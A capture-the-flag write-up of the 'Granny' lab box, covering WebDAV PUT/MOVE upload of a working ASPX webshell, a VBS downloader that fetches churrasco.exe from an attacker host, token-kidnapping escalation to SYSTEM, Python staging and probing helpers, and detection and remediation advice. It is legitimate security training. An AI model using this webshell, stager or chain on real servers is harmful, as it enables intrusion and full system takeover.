Overview
Granny is a companion box to Grandpa. Both run IIS 6.0 on Windows Server 2003 with identical privilege escalation paths. The critical difference is in initial access. On Grandpa, WebDAV write methods return 403 Forbidden, forcing exploitation via a buffer overflow (CVE-2017-7269). On Granny, PUT is permitted. Direct file upload via WebDAV replaces the need for a memory corruption exploit entirely.
The attack chain: upload an ASPX webshell as a .txt file via PUT, then rename it to .aspx via MOVE. Classic ASP (.asp) is blocked in the root virtual directory, but ASP.NET (.aspx) executes because ASP and ASP.NET use separate ISAPI handler mappings in IIS 6.0 (asp.dll versus aspnet_isapi.dll), and only the classic ASP path is restricted. Once code runs as NETWORK SERVICE, token kidnapping via churrasco.exe (MS09-012) escalates to SYSTEM. Total time from port scan to root flag: 4 minutes.
The broader lesson is about access control as a security boundary. Granny and Grandpa are identical systems where a single configuration difference (PUT allowed vs PUT blocked) changes the entire initial access approach.
Reconnaissance
I start with a service-version scan:
nmap -sC -sV -A -T4 -oA scans/granny 10.129.95.234
| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 80 | HTTP | Microsoft IIS httpd 6.0 | Default “Under Construction” page |
A single open port. The remaining 999 ports in the default scan range are filtered, indicating a host firewall. Nmap’s WebDAV scan reveals the full method list:
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST,
| COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST,
| COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Both PUT and MOVE appear in the allowed methods list. On Grandpa, these methods appear in public options but return 403 when tested.
| Component | Version |
|---|---|
| Operating System | Windows Server 2003 SP2 (5.2.3790) |
| Web Server | Microsoft IIS 6.0 |
| Extensions | WebDAV (PUT/MOVE enabled), ASP.NET (.NET 2.0) |
Attack Surface Analysis
WebDAV write access confirmation
curl -s -X PUT http://10.129.95.234/test.txt -d "hello world" \
-o /dev/null -w "%{http_code}"
# 201
curl -s http://10.129.95.234/test.txt
# hello world
PUT returns 201 Created. Uploaded files are immediately accessible.
Extension execution testing
curl -s -X PUT http://10.129.95.234/test.asp \
-d '<%response.write("test")%>' -o /dev/null -w "%{http_code}"
# 201
curl -s http://10.129.95.234/test.asp -o /dev/null -w "%{http_code}"
# 403
PUT succeeds, but requesting the ASP file returns 403 Forbidden: the root virtual directory refuses to run classic ASP. ASP.NET (.aspx) is mapped to a different ISAPI extension (aspnet_isapi.dll rather than asp.dll), that mapping carries no such restriction, and .aspx pages execute. Whenever one scripting engine is blocked, probe every other server-side extension the platform maps before concluding that uploads are harmless.
Vulnerability Analysis
The attack combines two weaknesses:
1. Unrestricted WebDAV write access (CWE-434). IIS 6.0 is configured with WebDAV enabled for anonymous users. PUT and MOVE accept unauthenticated requests. The MOVE method permits renaming files to any extension, bypassing upload restrictions.
2. MS09-012 token kidnapping (CWE-269). On Windows Server 2003 the NETWORK SERVICE account holds SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, and several services, RPCSS among them, run under that same account. Churrasco.exe exploits the token kidnapping flaw fixed by MS09-012: from a NETWORK SERVICE process it reaches a thread in the RPCSS service that is impersonating SYSTEM, takes that token, and uses it to create a new process running as SYSTEM.
| Attribute | Value |
|---|---|
| CVE | N/A (WebDAV misconfiguration) + MS09-012 |
| CVSS v3 | 9.8 (WebDAV), 7.8 (MS09-012); author's estimates, not NVD scores |
| CWE | CWE-434 (Unrestricted Upload), CWE-269 (Improper Privilege) |
| MITRE ATT&CK | T1190 (Initial Access), T1134.001 (Token Impersonation) |
Exploitation
ASPX webshell via PUT + MOVE
The webshell uses inline VB.NET. A C# version works equally on ASP.NET 2.0; only the Language attribute and the syntax differ. The page runs the command through cmd.exe, captures stdout and stderr, and HTML-encodes the result:
cat > shell.aspx << 'EOF'
<%@ Page Language="VB" %>
<%@ Import Namespace="System.Diagnostics" %>
<%
Dim c As String = Request("cmd")
If c <> "" Then
Dim p As New Process()
p.StartInfo.FileName = "cmd.exe"
p.StartInfo.Arguments = "/c " & c
p.StartInfo.UseShellExecute = False
p.StartInfo.RedirectStandardOutput = True
p.StartInfo.RedirectStandardError = True
p.Start()
Dim o As String = p.StandardOutput.ReadToEnd()
o &= p.StandardError.ReadToEnd()
p.WaitForExit()
Response.Write("<pre>" & Server.HtmlEncode(o) & "</pre>")
End If
%>
EOF
Upload as .txt, then rename to .aspx:
curl -s -X PUT http://10.129.95.234/shell.txt \
--data-binary @shell.aspx -o /dev/null -w "%{http_code}"
# 201
curl -s -X MOVE http://10.129.95.234/shell.txt \
-H "Destination: http://10.129.95.234/shell.aspx" \
-o /dev/null -w "%{http_code}"
# 201
Confirm RCE:
curl -s "http://10.129.95.234/shell.aspx?cmd=whoami"
# nt authority\network service
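The extension tests above and the PUT + MOVE upload are the same three-request sequence with a different extension each time. The following is an added Python example, not code from the original writeup: it runs that sequence (PUT as .txt, MOVE with a Destination header, GET the result) for a list of extensions and classifies what the server did with each. Because it has to run offline, it talks to a constructed in-memory stand-in (FakeIIS) that only mimics the responses observed on this page and is not IIS; the loopback host and port, the marker body and the verdict names are this example's own assumptions. Point put_move_probe at a real host and port to probe a live target.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit


class FakeIIS(BaseHTTPRequestHandler):
    """Constructed stand-in for the target (not IIS): keeps uploads in memory and
    mimics the behaviour observed on the page, i.e. anonymous PUT/MOVE allowed,
    classic .asp refused with 403, .aspx handed to a script handler."""
    store = {}

    def log_message(self, *args):        # silence per-request logging
        pass

    def _reply(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", "0"))
        existed = self.path in self.store
        self.store[self.path] = self.rfile.read(length)
        self._reply(204 if existed else 201)      # RFC 4918: 201 created, 204 overwritten

    def do_MOVE(self):
        dest = urlsplit(self.headers.get("Destination", "")).path
        if self.path not in self.store or not dest:
            self._reply(404)
            return
        existed = dest in self.store
        self.store[dest] = self.store.pop(self.path)   # rename: the extension changes here
        self._reply(204 if existed else 201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404)
        elif self.path.endswith(".asp"):
            self._reply(403)                      # classic ASP blocked in the root vdir
        elif self.path.endswith(".aspx"):
            self._reply(200, b"EXECUTED")         # ASP.NET handler ran the page
        else:
            self._reply(200, body)                # static handler returns bytes verbatim


def send(host, port, method, path, body=None, headers=None):
    """One request on a fresh connection; returns (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def put_move_probe(host, port, ext, marker=b"probe-marker"):
    """PUT a marker as .txt, MOVE it to the target extension, GET the result and
    classify what the server did. Verdict names are this example's own."""
    src, dst = "/probe_%s.txt" % ext, "/probe.%s" % ext
    put_status, _ = send(host, port, "PUT", src, body=marker)
    move_status, _ = send(host, port, "MOVE", src,
                          headers={"Destination": "http://%s:%d%s" % (host, port, dst)})
    get_status, body = send(host, port, "GET", dst)
    if put_status not in (201, 204):
        verdict = "upload-blocked"
    elif move_status not in (201, 204):
        verdict = "rename-blocked"
    elif get_status == 403:
        verdict = "forbidden"
    elif get_status == 200 and body == marker:
        verdict = "served-static"                 # uploaded bytes came back unchanged
    elif get_status == 200:
        verdict = "executed"                      # a handler transformed the content
    else:
        verdict = "http-%d" % get_status
    return {"put": put_status, "move": move_status, "get": get_status, "verdict": verdict}


def run_demo(exts=("txt", "asp", "aspx")):
    """Start the fake server on a random loopback port and probe each extension."""
    server = HTTPServer(("127.0.0.1", 0), FakeIIS)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        host, port = server.server_address
        return {ext: put_move_probe(host, port, ext) for ext in exts}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for ext, result in run_demo().items():
        print(ext, result)
```

The classification deliberately compares the GET body with the uploaded marker rather than trusting the status code alone: a 200 that echoes the marker back means the static handler served the file, while a 200 with different content means a script handler ran it, which is the distinction the .asp/.aspx tests above turn on.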
Privilege escalation via token kidnapping
NETWORK SERVICE cannot read the user profiles directly, so privilege escalation is required for the flags.
A default Windows Server 2003 install has no PowerShell and no certutil -urlcache or bitsadmin download capability. The standard file transfer technique is a VBS XMLHTTP downloader, written line by line through the webshell and then run with cscript:
# Write VBS downloader line by line through the webshell
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+Set+o%3DCreateObject(%22Microsoft.XMLHTTP%22)+>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+o.Open+%22GET%22,%22http://10.10.14.5:8888/churrasco.exe%22,False+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+o.Send+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+Set+s%3DCreateObject(%22ADODB.Stream%22)+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Open+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Type%3D1+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Write+o.ResponseBody+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.SaveToFile+%22C:\WINDOWS\Temp\c.exe%22,2+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Close+>>+C:\WINDOWS\Temp\d.vbs"
# Execute the downloader
curl -s "http://10.129.95.234/shell.aspx?cmd=cscript+C:\WINDOWS\Temp\d.vbs"
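Hand-encoding those nine echo lines is error-prone, and any line containing a cmd.exe metacharacter outside quotes (&, |, parentheses) gets mangled before echo ever sees it. The following is an added Python example, not code from the original writeup, that generates the downloader, caret-escapes the lines for cmd.exe, and emits the URL-encoded webshell requests. The listener URL, drop path, script path and webshell URL are assumed values taken from this page; decode_cmd is a helper of this example.

```python
from urllib.parse import quote_plus, unquote_plus

# Assumed values for illustration: attacker listener, drop path, script path, webshell.
LISTENER_URL = "http://10.10.14.5:8888/churrasco.exe"
EXE_DEST = r"C:\WINDOWS\Temp\c.exe"
SCRIPT_PATH = r"C:\WINDOWS\Temp\d.vbs"
WEBSHELL = "http://10.129.95.234/shell.aspx"


def xmlhttp_downloader(url, dest):
    """VBS lines for an XMLHTTP + ADODB.Stream binary download
    (Type=1 is binary, SaveToFile mode 2 overwrites an existing file)."""
    return [
        'Set o=CreateObject("Microsoft.XMLHTTP")',
        'o.Open "GET","%s",False' % url,
        'o.Send',
        'Set s=CreateObject("ADODB.Stream")',
        's.Open',
        's.Type=1',
        's.Write o.ResponseBody',
        's.SaveToFile "%s",2' % dest,
        's.Close',
    ]


def cmd_escape(text):
    """Caret-escape cmd.exe metacharacters outside double quotes so echo emits
    them literally. Inside quotes cmd already treats them as text, and a caret
    there would itself be echoed, so quoted spans are left alone.
    (% is not handled: cmd expands %NAME% even inside quotes, so avoid it.)"""
    out, in_quotes = [], False
    for ch in text:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in '&|<>^()' and not in_quotes:
            out.append('^')
        out.append(ch)
    return ''.join(out)


def echo_commands(lines, script_path):
    """One echo per script line; the first uses > to create the file, the rest >>."""
    cmds = []
    for i, line in enumerate(lines):
        redirect = '>' if i == 0 else '>>'
        cmds.append('echo %s %s %s' % (cmd_escape(line), redirect, script_path))
    return cmds


def webshell_urls(cmds, webshell=WEBSHELL):
    """URL-encode each command for the webshell's cmd parameter (spaces become +)."""
    return ['%s?cmd=%s' % (webshell, quote_plus(c, safe='')) for c in cmds]


def decode_cmd(url):
    """Inverse of webshell_urls for one URL: recover the command the server will see."""
    return unquote_plus(url.split("?cmd=", 1)[1])


def build_stage(url=LISTENER_URL, dest=EXE_DEST, script_path=SCRIPT_PATH, webshell=WEBSHELL):
    """Full request list: write the script line by line, then run it with cscript."""
    cmds = echo_commands(xmlhttp_downloader(url, dest), script_path)
    cmds.append('cscript %s' % script_path)
    return webshell_urls(cmds, webshell)


if __name__ == "__main__":
    for u in build_stage():
        print(u)
```

Feed each printed URL to curl in order; the last one runs the downloader. The same generator works for any other VBS or batch staging script, which is the point of preparing it before a legacy engagement rather than typing echo lines under time pressure.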
Churrasco's command parser splits on spaces, so paths with spaces (Documents and Settings) require 8.3 short filenames:
# User flag
curl -s "http://10.129.95.234/shell.aspx?cmd=C:\WINDOWS\Temp\c.exe+%22type+DOCUME~1\Lakis\Desktop\user.txt%22"
# [redacted]
# Root flag
curl -s "http://10.129.95.234/shell.aspx?cmd=C:\WINDOWS\Temp\c.exe+%22type+DOCUME~1\ADMINI~1\Desktop\root.txt%22"
# [redacted]
Post-Exploitation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
# OS Version: 5.2.3790 Service Pack 2 Build 3790
whoami /priv
# SeAuditPrivilege Disabled
# SeAssignPrimaryTokenPrivilege Disabled
# SeChangeNotifyPrivilege Enabled
Windows Server 2003 reached end-of-life on 14 July 2015. Vulnerabilities in IIS 6.0 have continued to be disclosed since, including CVE-2017-7269 (disclosed March 2017, nearly two years after EOL), and the platform receives no routine security updates. The exposure is permanent as long as the system stays in service.
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1190 | IIS logs: PUT and MOVE requests to any URI |
| Defence evasion | T1036.008 | IIS logs: MOVE from an external address followed by the first successful hit on a previously unseen .aspx URI (the Destination header is not a default W3C log field) |
| Persistence | T1505.003 | File integrity: new .aspx files in the IIS web root |
| Execution | T1059.005 | Process: cscript.exe launching from C:\WINDOWS\Temp\ |
| Privilege esc. | T1134.001 | Sysmon: NETWORK SERVICE child process running as SYSTEM |
IIS W3C logs: PUT and MOVE are not normal HTTP methods in most environments. Any PUT or MOVE request from an external address is a high-confidence indicator. One caveat: the default W3C fields record cs-method and cs-uri-stem but no request headers, so the MOVE's Destination (the renamed .aspx) is not logged directly. Correlate a MOVE with the first successful request to a script-mapped URI (.aspx, .asp) that the log has not seen before, or capture headers at a proxy or WAF in front of the server.
Process monitoring: cmd.exe spawned as a child of w3wp.exe is anomalous. An executable dropped to C:\WINDOWS\Temp\ followed by cmd.exe or whoami.exe running as SYSTEM is the churrasco pattern.
VBS downloader detection: cscript.exe or wscript.exe creating Microsoft.XMLHTTP and ADODB.Stream COM objects is a standard post-exploitation indicator.
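The log-based detections above reduce to three rules over the default IIS W3C fields. The following is an added Python example, not part of the original writeup, that runs them over a constructed IIS 6.0 log excerpt (the log lines are made up to mirror this attack, not a real capture). The trusted network list, the script extension list, the command hints and the rule names are this example's assumptions; the second rule is the heuristic replacement for the Destination header that the W3C format does not record.

```python
import ipaddress

# Assumed trusted networks (illustrative): WebDAV writes from here are expected.
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.0/24")]
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".cdx")
SHELL_HINTS = ("cmd=", "whoami", "cscript", "net+user", "net%20user")

# Constructed IIS 6.0 W3C extended log excerpt with the default field set.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2024-01-01 12:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2024-01-01 12:00:01 10.129.95.234 GET /iisstart.htm - 80 - 10.10.14.5 Mozilla/5.0 200 0 0
2024-01-01 12:00:02 10.129.95.234 PROPFIND / - 80 - 192.168.1.50 Microsoft-WebDAV-MiniRedir/6.1 207 0 0
2024-01-01 12:00:03 10.129.95.234 PUT /docs/notes.txt - 80 - 192.168.1.50 Microsoft-WebDAV-MiniRedir/6.1 201 0 0
2024-01-01 12:00:04 10.129.95.234 PUT /shell.txt - 80 - 10.10.14.5 curl/8.5.0 201 0 0
2024-01-01 12:00:05 10.129.95.234 MOVE /shell.txt - 80 - 10.10.14.5 curl/8.5.0 201 0 0
2024-01-01 12:00:06 10.129.95.234 GET /shell.aspx cmd=whoami 80 - 10.10.14.5 curl/8.5.0 200 0 0
2024-01-01 12:00:09 10.129.95.234 GET /shell.aspx cmd=cscript+C:\WINDOWS\Temp\d.vbs 80 - 10.10.14.5 curl/8.5.0 200 0 0
"""


def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            if fields is None:
                raise ValueError("log data before #Fields directive")
            values = line.split()
            if len(values) == len(fields):        # skip truncated lines
                rows.append(dict(zip(fields, values)))
    return rows


def is_external(ip):
    """True unless the client address falls inside a trusted network."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED_NETS)


def detect(rows):
    """Return (timestamp, rule, client, detail) alerts in log order."""
    alerts, last_move, seen_scripts = [], {}, set()
    for r in rows:
        when = "%s %s" % (r["date"], r["time"])
        method, uri = r["cs-method"].upper(), r["cs-uri-stem"].lower()
        query, client, status = r["cs-uri-query"], r["c-ip"], int(r["sc-status"])
        # Rule 1: any WebDAV write method from outside the trusted networks.
        if method in WRITE_METHODS and is_external(client):
            alerts.append((when, "webdav-write-external", client,
                           "%s %s -> %d" % (method, uri, status)))
            if method == "MOVE" and 200 <= status < 300:
                last_move[client] = when
        # Rules 2 and 3 only concern script-mapped URIs that were actually served.
        if method in ("GET", "POST") and uri.endswith(SCRIPT_EXTS) and 200 <= status < 300:
            # Rule 2: a script URI first served after the same client issued a MOVE
            # stands in for the unlogged Destination header.
            if uri not in seen_scripts and client in last_move:
                alerts.append((when, "new-script-after-move", client,
                               "%s first served after MOVE at %s" % (uri, last_move[client])))
            # Rule 3: command-like query strings against a script URI.
            if any(h in query.lower() for h in SHELL_HINTS):
                alerts.append((when, "webshell-command", client, "%s?%s" % (uri, query)))
            seen_scripts.add(uri)
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_w3c(SAMPLE_LOG)):
        print(*alert)
```

The internal PUT from 192.168.1.50 produces nothing because the address is allowlisted, which is what keeps rule 1 usable on servers where WebDAV is legitimately in use; everything the attacker did from 10.10.14.5 fires.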
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Decommission Windows Server 2003 (EOL since July 2015) | High | Critical |
| P0 | Disable WebDAV in IIS or block PUT/MOVE at the perimeter | Low | Critical |
| P1 | If WebDAV is required, restrict to authenticated users | Low | High |
| P1 | Block executable extensions in WebDAV upload configuration | Low | High |
| P2 | Remove token privileges from service accounts where unneeded | Medium | Medium |
| P2 | Deploy WAF blocking WebDAV write methods from external IPs | Medium | Medium |
The fundamental problem is the operating system. Windows Server 2003 has been unsupported for over a decade. Even disabling WebDAV and restricting network access leaves the system vulnerable to kernel exploits, TCP/IP stack vulnerabilities, and other attack vectors that will never be patched. The only defensible remediation is migration to a supported OS.
Key Takeaways
- Access control configuration is as important as software patching. Granny and Grandpa run identical software. The only difference is whether PUT is allowed. That single configuration change transforms the initial access approach from a clean file upload to a memory corruption exploit. Configuration hardening deserves the same rigour as patch management.
- ASP.NET executes where classic ASP does not. IIS 6.0 has separate handler mappings for ASP (asp.dll) and ASP.NET (aspnet_isapi.dll). When one scripting engine is blocked, always test the others. The PUT + MOVE technique (upload as `.txt`, rename to `.aspx`) is a standard IIS 6.0 bypass that defenders should test for in hardening reviews.
- The VBS XMLHTTP downloader is the standard legacy Windows file transfer technique. A default Windows Server 2003 install lacks `certutil -urlcache`, `bitsadmin`, and PowerShell. The `Microsoft.XMLHTTP` and `ADODB.Stream` COM objects, driven from `cscript`, are the most practical built-in HTTP download mechanism. Preparing this script in advance saves significant time on legacy targets.
- 8.3 short filenames bypass argument parsing issues. Tools that split command arguments on spaces (like churrasco) cannot handle paths such as `C:\Documents and Settings`. The short names `DOCUME~1` and `ADMINI~1` avoid this entirely. NTFS generates 8.3 names by default on the system volume on every Windows version, so they are reliable on Server 2003; confirm with `dir /x` if in doubt.